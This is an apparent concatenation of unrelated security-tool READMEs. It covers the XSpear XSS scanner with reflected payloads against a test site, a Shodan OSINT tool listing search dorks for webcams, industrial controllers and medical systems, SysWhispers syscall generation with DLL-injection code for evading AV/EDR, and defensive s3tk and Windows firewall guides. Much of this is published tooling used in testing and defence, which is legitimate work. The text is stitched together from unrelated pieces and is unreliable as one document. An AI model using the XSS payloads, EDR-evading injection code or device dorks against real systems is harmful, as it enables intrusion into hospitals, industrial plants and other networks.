 + Available Event Handler: "onBeforeEditFocus","onAbort","onActivate","onAfterUpdate","onBeforeCopy","onAfterPrint","onBeforeActivate","onBeforeCut","onBeforeDeactivate","onChange","onBeforePrint","onBounce","onBeforeUnload","onCellChange","onBeforePaste","onClick","onBegin","onBlur","onBeforeUpdate","onDataSetChanged","onCut","onDblClick","onCopy","onContextMenu","onDataSetComplete","onDeactivate","onDataAvailable","onControlSelect","onDra   g","onDrop","onDragEnd","onEnd","onDragLeave","onDragStart","onDragOver","onDragEnter","onDragDrop","onError","onErrorUpdate","onFinish","onFilterChange","onKeyPress","onHelp","onFocus","onInput","onHashChange","onKeyDown","onFocusIn","onFocusOut","onMessage","onMouseDown","onLoad","onLayoutComplete","onMouseEnter","onLoseCapture","onloadstart","onMediaError","onKeyUp","onMediaComplete","onMouseOver","onMouseWheel","onMove","onMouseMove","onMouseOut","onOffline","onMoveStart","onMouseLeave","onMouseUp","onMoveEnd","onPropertyChange","onOnline","onPause","onPaste","onReadyStateChange","onRedo","onProgress","onPopState","onOutOfSync","onRepeat","onResume","onRowExit","onReset","onResizeEnd","onRowsEnter","onResizeStart","onReverse","onRowDelete","onRowInserted","onResize","onStop","onSeek","onSelect","onSubmit","onStorage","onStart","onScroll","onSelectionChange","onSyncRestored","onSelectStart","onUnload","ontouchstart","onbeforescriptexecute","onTimeError","onURLFlip","ontouchmove",   "ontouchend","onTrackChange","onUndo","onafterscriptexecute","onpointermove","onpointerleave","onpointerup","onpointerover","onpointerdown","onpointerenter","onloadstart","onloadend","onpointerout"
 + Available HTML Tag: "script","img","embed","video","audio","meta","style","frame","iframe","svg","object","frameset","applet"
 + Available Useful Code: "document.cookie","document.location","window.location"

< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?-
..snip..
[19] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff
[20] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E&zfdfasdf=124fffff
[21] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert(45)%22%3E&zfdfasdf=124fffff
[22] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)   %3E&zfdfasdf=124fffff
[23] http://testphp.vulnweb.com/listproducts.php?cat=123'%22%3E%3Csvg/onload=alert(45)%3E&zfdfasdf=124fffff

...snip...

$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123&zfdfasdf=124fffff" -v 1 -o json
{"starttime":"2019-08-14 23:58:12 +0900","endtime":"2019-08-14 23:58:44 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Found Server: nginx/1.4.1"},{"id":1,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not set HSTS"},{"id":2,"type":"INFO","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Content-Type: text/html"},{"id":3,"type":"LOW","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set X-Frame-Options"},{"id":4,"type":"MIDUM","issue":"STATIC ANALYSIS","method":"GET","param":"-","payload":"<original query>","description":"Not Set CSP"},{"id":5,"type":"INFO","issue":"DYNAMIC    ANALYSIS","method":"GET","param":"cat","payload":"XsPeaR\"","description":"Found SQL Error Pattern"},{"id":6,"type":"INFO","issue":"REFLECTED","method":"GET","param":"cat","payload":"rEfe6","description":"reflected parameter"},{"id":7,"type":"INFO","issue":"FILERD RULE","method":"GET","param":"cat","payload":"onhwul=64","description":"not filtered event handler on{any} pattern"},{"id":8,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"reflected XSS Code"},{"id":9,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<textarea autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":10,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<video/poster/onerror=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":11,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"refl   ected HTML5 XSS Code"},{"id":12,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert`45`\">","description":"reflected HTML5 XSS Code"},{"id":13,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<select autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":14,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"reflected HTML5 XSS Code"},{"id":15,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<input autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":16,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"\"><iframe/src=JavaScriPt:alert(45)>","description":"reflected XSS Code"},{"id":17,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<meter onmouseover=alert(45)>0</meter>","description":"reflected HTML5 XSS Cod   e"},{"id":18,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<keygen autofocus onfocus=alert(45)>","description":"reflected onfocus XSS Code"},{"id":19,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<audio src onloadstart=alert(45)>","description":"triggered <audio src onloadstart=alert(45)>"},{"id":20,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<marquee onstart=alert(45)>","description":"triggered <marquee onstart=alert(45)>"},{"id":21,"type":"HIGH","issue":"XSS","method":"GET","param":"cat","payload":"<details/open/ontoggle=\"alert(45)\">","description":"triggered <details/open/ontoggle=\"alert(45)\">"},{"id":22,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"<script>alert(45)</script>","description":"triggered <script>alert(45)</script>"},{"id":23,"type":"VULN","issue":"XSS","method":"GET","param":"cat","payload":"'\"><svg/on   load=alert(45)>","description":"triggered <svg/onload=alert(45)>"}]}

require 'XSPear'

# Set options
options = {}
options['thread'] = 30
options['cookie'] = "data=123"
options['blind'] = "https://hahwul.xss.ht"
options['output'] = json

# Create XSpear object with url, options
s = XspearScan.new "https://www.hahwul.com?target_url", options

# Scanning
s.run
result = s.report.to_json
r = JSON.parse result

makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback funcion")
# type: f(ilterd?) r(eflected?) x(ss?)
# category i(nfo) v(uln) l(ow) m(edium) h(igh) 

# e.g 
# makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)

  class CallbackStringMatch < ScanCallbackFunc
    def run
      if @response.body.include? @query
        [true, "reflected #{@query}"]
      else
        [false, "not reflected #{@query}"]
      end
    end
  end

class ScanCallbackFunc()
    def initialize(url, method, query, response)
      @url = url
      @method = method
      @query = query
      @response = response
      # self.run
    end

    def run
      # override
    end
end

• CallbackXSSSelenium
• CallbackErrorPatternMatch
• CallbackCheckHeaders
• CallbackStringMatch
• CallbackNotAdded
• etc...

$ gem update XSpear

$ git pull -v

$ git reset --hard HEAD; git pull -v

• beautiful soup
• python3
• django
• pynmea2
• celery
• redis
• Shodan
• BinaryEdge
• WHOISXMLAPI
• Flickr
• Google Maps API

python3 manage.py makemigrations
python3 manage.py migrate
python3 manage.py runserver

• "All results" checkbox means get all results from Shodan, if it's turned off - only first page (100) results will be downloaded.
• "Own database" checkbox does not work but shows that is possible to integrate your own geolocation database. Let me know if you have access to better than Shodan's default one.

"webcam": "device:webcam",
"webcamxp":"webcamxp",
"vivotek":"vivotek",
"techwin":"techwin",
"mobotix":"mobotix",
"iqinvision":"iqinvision",
"grandstream":"Grandstream",
'printer': "device:printer",
'mqtt': 'product:mqtt',
'rtsp': "port:'554'",
'dicom': "dicom",
"ipcamera": "IPCamera_Logo",
"yawcam": "yawcam",
"blueiris": "http.favicon.hash:-520888198",
'ubnt': "UBNT Streaming Server",
"go1984": "go1984",
"dlink": "Server: Camera Web Server",
"avtech": "linux upnp avtech",
"adh": "ADH-web",
"axis":'http.title:"axis" http.html:live',
"rdp":"has_screenshot:true port:3389",
"vnc":"has_screenthos:true port:5901",
"screenshot":"has_screenshot:true !port:3389 !port:3388 !port:5900",

"niagara": "port:1911,4911 product:Niagara",
'bacnet': "port:47808",
'modbus': "port:502",
'siemens': 'Original Siemens Equipment Basic Firmware:',
'dnp3': "port:20000 source address",
   "ethernetip": "port:44818",
"gestrip": 'port:18245,18246 product:"general electric"',
'hart': "port:5094 hart-ip",
'pcworx': "port:1962 PLC",
"mitsubishi": "port:5006,5007 product:mitsubishi",
"omron": "port:9600 response code",
"redlion": 'port:789 product:"Red Lion Controls"',
'codesys': "port:2455 operating system",
"iec": "port:2404 asdu address",
'proconos': "port:20547 PLC",

"plantvisor": "Server: CarelDataServer",
"iologik": "iologik",
"moxa": "Moxa",
"akcp": "Server: AKCP Embedded Web Server",
"spidercontrol": "powered by SpiderControl TM",
"tank": "port:10001 tank",
"iq3": "Server: IQ3",
"is2": "IS2 Web Server",
"vtscada": "Server: VTScada",
'zworld': "Z-World Rabbit",
"nordex": "Jetty 3.1.8 (Windows 2000 5.0 x86)",

"axc":"PLC Type: AXC",
"modicon":"modicon",
"xp277":"HMI, XP277",
"vxworks":"vxworks",
"eig":"EIG Embedded Web Server",
"digi":"TransPort WR21",
"windweb":"server: WindWeb",
"moxahttp":"MoxaHttp",
"lantronix":"lantronix",
"entelitouch":"Server: DELTA enteliTOUCH",
"energyict_rtu":"EnergyICT RTU",
"crestron":"crestron",
"wince":'Server: "Microsoft-WinCE"',
"ipc@chip":"IPC@CHIP",
"addup":"addUPI",
"anybus":'"anybus-s"',
"windriver":"WindRiver-WebServer",
"wago":"wago",
"niagara_audit":"niagara_audit",
"niagara_web_server":"Niagara Web Server",
"trendnet":"trendnet",
"stulz_klimatechnik":"Stulz GmbH Klimatechnik",
"somfy":"title:Somfy",
"scalance":"scalance",
"simatic":"simatic",
"simatic_s7":"Portal0000",
"schneider_electric":"Schneider Electric",
"power_measurement":"Power Measurement Ltd",
"power_logic":"title:PowerLogic",
"telemecanique_bxm":"TELEMECANIQUE BMX",
"schneider_web":"Schneider-WEB",
"fujitsu_serverview":"serverview",
"eiportal":"eiPortal",
"ilon":"i.LON",
"Webvisu":"Webvisu",
"total_access": 'ta g   en3 port:2000'

Medical
"zoll":"http.favicon.hash:-236942626",
"perioperative":"HoF Perioperative",
"wall_of_analytics":"title:'Wall of Analytics'",
"viztek_exa":"X-Super-Powered-By: VIZTEK EXA",
"desert_view_bkup":"title:'DESERT VIEW BKUP'",
"intuitim":"http.favicon.hash:159662640",
"Medcon Archiving System":"http.favicon.hash:-897903496",
"orthanc_explorer":"title:'Orthanc Explorer'",
"Marco Pacs":"title:'Marco pacs'", 
"osirix":"title:OsiriX",
"clari_pacs":"title:ClariPACS",
"siste_lab":"http.html:SisteLAB",
"opalweb":"html:opalweb",
"neuropro":"title:'EEG Laboratory'",
"tmw_document_imaging":"title:'TMW Document Imaging'",
"erez":"title:'eRez Imaging'",
"gluco_care":"html:'GlucoCare igc'",
"glucose_guide":"title:'glucose guide'",
"grandmed_glucose":"title:'Grandmed Glucose'",
"philips_digital_pathology":"title:'Philips Digital Pathology'",
"tricore_pathology":"title:'TriCore Pathology'",<   br/>"appsmart_ophthalmology":"title:'Appsmart Ophthalmology'",
"chs_ophthalmology":"title:'CHS Ophthalmology'",
"ram_soft":"html:powerreader",
"xnat":"http.favicon.hash:-230640598",
"iris_emr":"title:'Iris EMR'",
"eclinicalworks_emr":"title:'Web EMR Login Page'",
"open_emr":"http.favicon.hash:1971268439",
"oscar_emr":"title:'OSCAR EMR'",
"wm_emr":"http.favicon.hash:1617804812",
"doctors_partner_emr":"title:'DoctorsPartner'",
"mckesson_radiology":"title:'McKesson Radiology'",
"kodak_carestream":"title:'Carestream PACS'",
"meded":"title:meded",
"centricity_radiology":"http.favicon.hash:-458315012",
"openeyes":"http.favicon.hash:-885931907",
"orthanc":"orthanc",
"horos":"http.favicon.hash:398467600"
"open_mrs":"title:openmrs",
"mirth_connect":"http.favicon.hash:1502215759",
"acuity_logic":"title:AcuityLogic",
"optical_coherence_tomography":"title:'OCT Webview'",
"philips_intellispace":"title:INTELLISPAC   E",
"vitrea_intelligence":"title:'Vitrea intelligence'",
"phenom_electron_microscope":"title:'Phenom-World'",
"meddream_dicom_viewer":"html:Softneta",
"merge_pacs":"http.favicon.hash:-74870968",
"synapse_3d":"http.favicon.hash:394706326",
"navify":"title:navify",
"telemis_tmp":"http.favicon.hash:220883165",
"brainlab":"title:'Brainlab Origin Server'",
"nexus360":"http.favicon.hash:125825464",
"brain_scope":"title:BrainScope",
"omero_microscopy":"http.favicon.hash:2140687598",
"meditech":"Meditech",
"cynetics":"cynetics",
"promed":"Promed",
"carestream":"Carestream",
"carestream_web":"title:Carestream",
"vet_rocket":"http.html:'Vet Rocket'",
"planmeca":"Planmeca",
"vet_view":"http.favicon.hash:1758472204",
"lumed":"http.html:'LUMED'",
"infinitt":"http.favicon.hash:-255936262",
"labtech":"labtech",
"progetti":"http.html:'Progetti S.r.l.'",
"qt_medical":"http.html:'QT Medical'",
"aspel":   "ASPEL",
"huvitz_optometric":"http.html:'Huvitz'",
"optovue":"Optovue",
"optos_advance":"http.title:'OptosAdvance'",
"asthma_monitoring_adamm":"http.title:'HCO Telemedicine'",
"pregnabit":"http.html:'Pregnabit'",
"prime_clinical_systems":"http.html:'Prime Clinical Systems'",
"omni_explorer":"http.title:OmniExplorer",
"avizia":"http.html:'Avizia'",
"operamed":"Operamed",
"early_sense":"http.favicon.hash:-639764351",
"tunstall":"http.html:'Tunstall'",
"clini_net":"http.html:'CliniNet®'",
"intelesens":"title:'zensoronline)) - online monitoring'",
"kb_port":"http.html:'KbPort'",
"nursecall_message_service":"http.title:'N.M.S. - Nursecall Message Service'",
"image_information_systems":"http.html:'IMAGE Information Systems'",
"agilent_technologies":"Agilent Technologies port:5025",
"praxis_portal2":"http.html:'Medigration'",
"xero_viewer":"http.title:'XERO Viewer'"

Excluded:
title:"pacemake   r-id"
html:klinikinew
title:"EEG Viewer"
http.favicon.hash:-1989988507
plexus platenet
http.favicon.hash:-189701579
title:"Insulin Dosage"
pathology image seve
http.favicon.hash:538032019
title:"MsFLASH"
title:"THIP EMR"
title:"CARDIOHF"
title:"CN EMR Office"
Power2Practice
http.favicon.hash:-1982401487
Cosmed EMR
http.favicon.hash:-1747178511
title:" Premier Radiology synapse"
title:"PRIME - Electrical Resistivity Tomography"
title:"OCT II System"
http.favicon.hash:-582594220
title:"Atomic Force Microscope"
title:axeda
http.favicon.hash:-1351683412
title:"InTouch Health Log Manager"
title:"Pharma Vtiger"
title:sema4
NAVIFY
Nextech
http.html:'Radiometer Medical '
HeartStart
http.favicon.hash:-893361748

• Background IoT photo by https://unsplash.com/@pawel_czerwinski
• Background ICS photo by https://unsplash.com/@wimvanteinde
• Background Healthcare photo by Arseny Togulev - https://unsplash.com/@tetrakiss
• Joli admin template - https://github.com/sbilly/joli-admin
• Search form - Colorlib Search Form v15
• country picker - https://github.com/mojoaxel/bootstrap-select-country
• Multiselect - https://github.com/varundewan/multiselect/
• Arsen Zbidniakov Flat UI Checkbox https://codepen.io/ARS/pen/aeDHE/
• icon from icons8.com and icon-icons.com

• It's version 1.0 so please raise an issue if you think you found any bug or have an idea to make it better.
• Sometimes search page keeps the last values, so please use ctrl+shift+R to refresh the main search page
• Debug info is left on purpose for raising an issues
• still some problems with getting cves from shodan search results
• Flickr infowindow size

• Live monitoring
• Offensive capabilities
• More devices
• More sources (Instagram?, Youtube?)
• Integration with Nmap and plcscan
• Extensive error checking/debugging
• Cleanup code, delete legacy/unused dependencies js, css files
• Keeping keys in db
• Your ideas

• Tested only on Kali Linux 2019.3
• It uses default sqlite Django database
• Buttons in Intel tab for device do not show the progress bars, you have a results in max couple of seconds.
• Own database button does not work, it shows that it's possible to load your own geolocation database. I haven't found better than Shodan's but let me know if you have access to one.
• Looking for nearby Tweets works but I wasn't able to find any tweets. It may be a problem with Twitter API. Let me know if you can find anything.
• Don't blame me for unintentional bug that might exhaust your Shodan/BinaryEdge/WHOISXMLAPI credits.
• I'm not responsible for any damage caused by using this tool.

> git clone https://github.com/jthuraisamy/SysWhispers.git
> cd SysWhispers
> pip3 install -r .\requirements.txt
> py .\syswhispers.py --help

# Export all functions with compatibility for all supported Windows versions (see example-output/).
py .\syswhispers.py --preset all -o syscalls_all

# Export just the common functions with compatibility for Windows 7, 8, and 10.
py .\syswhispers.py --preset common -o syscalls_common

# Export NtProtectVirtualMemory and NtWriteVirtualMemory with compatibility for all versions.
py .\syswhispers.py --functions NtProtectVirtualMemory,NtWriteVirtualMemory -o syscalls_mem

# Export all functions with compatibility for Windows 7, 8, and 10.
py .\syswhispers.py --versions 7,8,10 -o syscalls_78X

PS C:\Projects\SysWhispers> py .\syswhispers.py --preset common --out-file syscom

  ,         ,       ,_ /_   .  ,   ,_    _   ,_   ,
_/_)__(_/__/_)__/_/_/ / (__/__/_)__/_)__(/__/ (__/_)__
      _/_                         /
     (/                          /   @Jackson_T, 2019

SysWhispers: Why call the kernel when you can whisper?

Common functions selected.

Complete! Files written to:
        syscom.asm
        syscom.h

py .\syswhispers.py -f NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx -o syscalls

#include <Windows.h>

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    WriteProcessMemory(hProcess, lpBaseAddress, dllPath, strlen(dllPath), nullptr);
    CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);
}

#include <Windows.h>
#include "syscalls.h" // Import the generated header.

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    HANDLE hThread = NULL;
    LPVOID lpAllocationStart = nullptr;
    SIZE_T szAllocationSize = strlen(dllPath);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    NtAllocateVirtualMemory(hProcess, &lpAllocationStart, 0, (PULONG)&szAllocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    NtWriteVirtualMemory(hProcess, lpAllocationStart, (PVOID)dllPath, strlen(dllPath), nullptr);
    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, lpStartAddress, lpAllocationStart, FALSE, 0, 0, 0, nullptr);
}

1. Copy the generated H/ASM files into the project folder.
2. In Visual Studio, go to Project→ Build Customizations... and enable MASM.
3. In the Solution Explorer, add the .h and .asm files to the project as header and source files, respectively.
4. Go to the properties of the ASM file, and set the Item Type to Microsoft Macro Assembler.
5. Ensure that the project platform is set to x64. 32-bit projects are not supported at this time.

• Only 64-bit Windows is supported at this time.
• System calls from the graphical subsystem (win32k.sys) are not supported.
• Tested on Visual Studio 2019 (v142) with Windows 10 SDK.

• ModuleNotFoundError in Python script.
  • Ensure that the required modules are installed with pip3 install -r requirements.txt.
• Type redefinitions errors: a project may not compile if typedefs in syscalls.h have already been defined.
  • Ensure that only required functions are included (i.e. --preset all is rarely necessary).
  • If a typedef is already defined in another used header, then it could be removed from syscalls.h.

• @j00ru for maintaining syscall numbers in machine-readable formats.
• @FoxHex0ne for cataloguing many function prototypes and typedefs in a machine-readable format.
• @PetrBenes, NTInternals.net team, and MSDN for additional prototypes and typedefs.
• @Cn33liz for the initial Dumpert POC implementation.

• @0x00dtm: Userland API Monitoring and Code Injection Detection
• @0x00dtm: Defeating Userland Hooks (ft. Bitdefender) (Code)
• @Cn33liz: Combining Direct System Calls and sRDI to bypass AV/EDR (Code)
• @SpecialHoang: Bypass EDR’s memory protection, introduction to hooking (Code)
• @xpn and @domchell: Silencing Cylance: A Case Study in Modern EDRs
• @mrjefftang: Universal Unhooking: Blinding Security Software (Code)
• @spotheplanet: Full DLL Unhooking with C++
• @hasherezade: Floki Bot and the stealthy dropper
• @hodg87: Latest Trickbot Variant has New Tricks Up Its Sleeve
• @hodg87: Malware Mitigation when Direct System Calls are Used

Another day, another leaky Amazon S3 bucket
— The Register, 12 Jul 2017

pip install s3tk

pip install awscli
aws configure

• ACL open to public
• policy open to public
• logging enabled
• versioning enabled
• default encryption enabled

s3tk scan

s3tk scan my-bucket my-bucket-2

s3tk scan "my-bucket*"

s3tk scan --log-bucket my-s3-logs --log-bucket other-region-logs --log-prefix "{bucket}/"

s3tk scan --skip-logging --skip-versioning --skip-default-encryption

s3tk scan --sns-topic arn:aws:sns:...

s3tk list-policy

s3tk list-policy my-bucket my-bucket-2

s3tk list-policy --named

s3tk set-policy my-bucket --no-object-acl

s3tk delete-policy my-bucket

s3tk enable-logging --log-bucket my-s3-logs

s3tk enable-logging my-bucket my-bucket-2 --log-bucket my-s3-logs

s3tk enable-logging --log-bucket my-s3-logs --log-prefix "logs/{bucket}/"

• buckets with logging already enabled are not updated at all
• the log bucket must in the same region as the source bucket - run this command multiple times for different regions
• it can take over an hour for logs to show up

s3tk enable-versioning

s3tk enable-versioning my-bucket my-bucket-2

s3tk enable-default-encryption

s3tk enable-default-encryption my-bucket my-bucket-2

s3tk scan-object-acl my-bucket

s3tk scan-object-acl my-bucket --only "*.pdf"

s3tk scan-object-acl my-bucket --except "*.jpg"

s3tk reset-object-acl my-bucket

s3tk encrypt my-bucket

s3tk encrypt my-bucket --kms-key-id arn:aws:kms:...

s3tk encrypt my-bucket --customer-key secret-key

s3tk delete-unencrypted-versions my-bucket

s3tk scan-dns

AWS_PROFILE=your-profile s3tk

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Scan",
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                "s3:GetBucketAcl",
                "s3:GetBucketPolicy",
                "s3:GetBucketLogging",
                "s3:GetBucketVersioning",
                "s3:GetEncryptionConfiguration"
            ],
            "Resource": "*"
        },
        {
            "Sid": "ScanDNS",
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                "route53:ListHostedZones",
                "route53:ListResourceRecordSets"
            ],
            "Resource": "*"
        },
        {
            "Sid": "ListPolicy",
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                   "s3:GetBucketPolicy"
            ],
            "Resource": "*"
        },
        {
            "Sid": "SetPolicy",
            "Effect": "Allow",
            "Action": [
                "s3:PutBucketPolicy"
            ],
            "Resource": "*"
        },
        {
            "Sid": "DeletePolicy",
            "Effect": "Allow",
            "Action": [
                "s3:DeleteBucketPolicy"
            ],
            "Resource": "*"
        },
        {
            "Sid": "EnableLogging",
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                "s3:PutBucketLogging"
            ],
            "Resource": "*"
        },
        {
            "Sid": "EnableVersioning",
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                "   s3:PutBucketVersioning"
            ],
            "Resource": "*"
        },
        {
            "Sid": "EnableDefaultEncryption",
            "Effect": "Allow",
            "Action": [
                "s3:ListAllMyBuckets",
                "s3:PutEncryptionConfiguration"
            ],
            "Resource": "*"
        },
        {
            "Sid": "ResetObjectAcl",
            "Effect": "Allow",
            "Action": [
                "s3:ListBucket",
                "s3:GetObjectAcl",
                "s3:PutObjectAcl"
            ],
            "Resource": [
                "arn:aws:s3:::my-bucket",
                "arn:aws:s3:::my-bucket/*"
            ]
        },
        {
            "Sid": "Encrypt",
            "Effect": "Allow",
            "Action": [
                "s3:ListBucket",
                "s3:GetObject",
                "s3:PutO   bject"
            ],
            "Resource": [
                "arn:aws:s3:::my-bucket",
                "arn:aws:s3:::my-bucket/*"
            ]
        },
        {
            "Sid": "DeleteUnencryptedVersions",
            "Effect": "Allow",
            "Action": [
                "s3:ListBucketVersions",
                "s3:GetObjectVersion",
                "s3:DeleteObjectVersion"
            ],
            "Resource": [
                "arn:aws:s3:::my-bucket",
                "arn:aws:s3:::my-bucket/*"
            ]
        }
    ]
}

CREATE EXTERNAL TABLE my_bucket (
    bucket_owner string,
    bucket string,
    time string,
    remote_ip string,
    requester string,
    request_id string,
    operation string,
    key string,
    request_verb string,
    request_url string,
    request_proto string,
    status_code string,
    error_code string,
    bytes_sent string,
    object_size string,
    total_time string,
    turn_around_time string,
    referrer string,
    user_agent string,
    version_id string
)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
    'serialization.format' = '1',
    'input.regex' = '([^ ]*) ([^ ]*) \\[(.*?)\\] ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) \\\"([^ ]*) ([^ ]*) (- |[^ ]*)\\\" (-|[0-9]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) (\"[^\"]*\\") ([^ ]*)$'
) LOCATION 's3://my-s3-logs/my-bucket/';

SELECT
    date_parse(time, '%d/%b/%Y:%H:%i:%S +0000') AS time,
    request_url,
    remote_ip,
    user_agent
FROM
    my_bucket
WHERE
    requester = '-'
    AND status_code LIKE '2%'
    AND request_url LIKE '/some-keys%'
ORDER BY 1

CREATE EXTERNAL TABLE cloudtrail_logs (
    eventversion STRING,
    userIdentity STRUCT<
        type:STRING,
        principalid:STRING,
        arn:STRING,
        accountid:STRING,
        invokedby:STRING,
        accesskeyid:STRING,
        userName:String,
        sessioncontext:STRUCT<
            attributes:STRUCT<
                mfaauthenticated:STRING,
                creationdate:STRING>,
            sessionIssuer:STRUCT<
                type:STRING,
                principalId:STRING,
                arn:STRING,
                accountId:STRING,
                userName:STRING>>>,
    eventTime STRING,
    eventSource STRING,
    eventName STRING,
    awsRegion STRING,
    sourceIpAddress STRING,
    userAgent STRING,
    errorCode STRING,
    errorMessage STRING,
    requestId  STRING,
    eventId  STRING,
    r   esources ARRAY<STRUCT<
        ARN:STRING,
        accountId:STRING,
        type:STRING>>,
    eventType STRING,
    apiVersion  STRING,
    readOnly BOOLEAN,
    recipientAccountId STRING,
    sharedEventID STRING,
    vpcEndpointId STRING,
    requestParameters STRING,
    responseElements STRING,
    additionalEventData STRING,
    serviceEventDetails STRING
)
ROW FORMAT SERDE 'com.amazon.emr.hive.serde.CloudTrailSerde'
STORED  AS INPUTFORMAT 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
OUTPUTFORMAT 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION  's3://my-cloudtrail-logs/'

SELECT
    eventTime,
    eventName,
    userIdentity.userName,
    requestParameters
FROM
    cloudtrail_logs
WHERE
    eventName LIKE '%Bucket%'
ORDER BY 1

• Strictly limit who can perform bucket-related operations
• Avoid mixing objects with different permissions in the same bucket (use a bucket policy to enforce this)
• Don’t specify public read permissions on a bucket level (no GetObject in bucket policy)
• Monitor configuration frequently for changes

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:PutObjectAcl",
            "Resource": "arn:aws:s3:::my-bucket/*"
        }
    ]
}

resource "aws_s3_bucket" "my_bucket" {
  bucket = "my-bucket"
  acl    = "private"

  logging {
    target_bucket = "my-s3-logs"
    target_prefix = "my-bucket/"
  }

  versioning {
    enabled = true
  }
}

pip install s3tk --upgrade

pip install git+https://github.com/ankane/s3tk.git --upgrade

docker run -it ankane/s3tk aws configure

docker commit $(docker ps -l -q) my-s3tk

docker run -it my-s3tk s3tk scan

• Windows firewall rulles organized into individual powershellscripts according to:

1. Rule group
2. Traffic direction
3. IP version (IPv4 / IPv6)
4. Further sorted according to programs and services

• such as for example:

2. ICMP traffic
3. Browser rules
4. rules for Windows system
5. Store apps
6. Windows services
7. Microsoft programs
8. 3rd party programs
9. broadcast traffic
10. multicast traffic
11. and the list goes on...

• You can choose which rulles you want, and apply only those or apply them all with single command to your firewall.
• All the rules are loaded into Local group policy giving you full power over default windows firewall.

1. Windows 10 Pro/Enterprise
2. Windows Powershell 5.1 Download Powershell
3. Git (Optional) Download Git

• these steps here are designed for for those who don't feel comfotable with git, Powershell or Local group policy
• You may loose internet conectivity for some of your programs or in rare cases even lose internet conectivity completely, if that happens, you can run ResetFirewall.ps1 to reset firewall to previous state.
• Inside the Readme folder there is a ResetFirewall.md, a guide on how to do it manually, by hand, if for some reason you're unable to run the script, or the script does not solve your problems.
• Also note that your current/existing rules will not be deleted unless you have rules in GPO whose group name interfere with group names from this ruleset.
• to be 100% sure please export your current GPO rules first, (if you don't know to do that, then ignore this, you don't have GPO rules)

1. Right click on the Task bar and select Taskbar settings
2. Toggle on Replace Command Prompt with Windows Powershell in the menu when I right click the start button
3. Right click on Start button in Windows system
4. Click Windows Powershell (Administrator) to open Powershell as Administrator (Input Admin password if needed)
5. Type: (or copy paste commands and hit enter) Get-ExecutionPolicy and remeber what the ouput is.
6. Type: Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
7. Type: cd C:\
8. Type: git clone git@github.com:metablaster/WindowsFirewallRuleset.git
9. Type: cd WindowsFirewallRuleset
10. Rules for programs such as internet browser, Visual Studio etc. depend on installation variables.
    Most paths are auto-searched and variables are updated, otherwise you get warning and description on how to fix the problem.
11. Back to Powershell console and type into console: .\SetupFirewall.ps1 and hit enter (You will be asked what kind of rulesets you want)
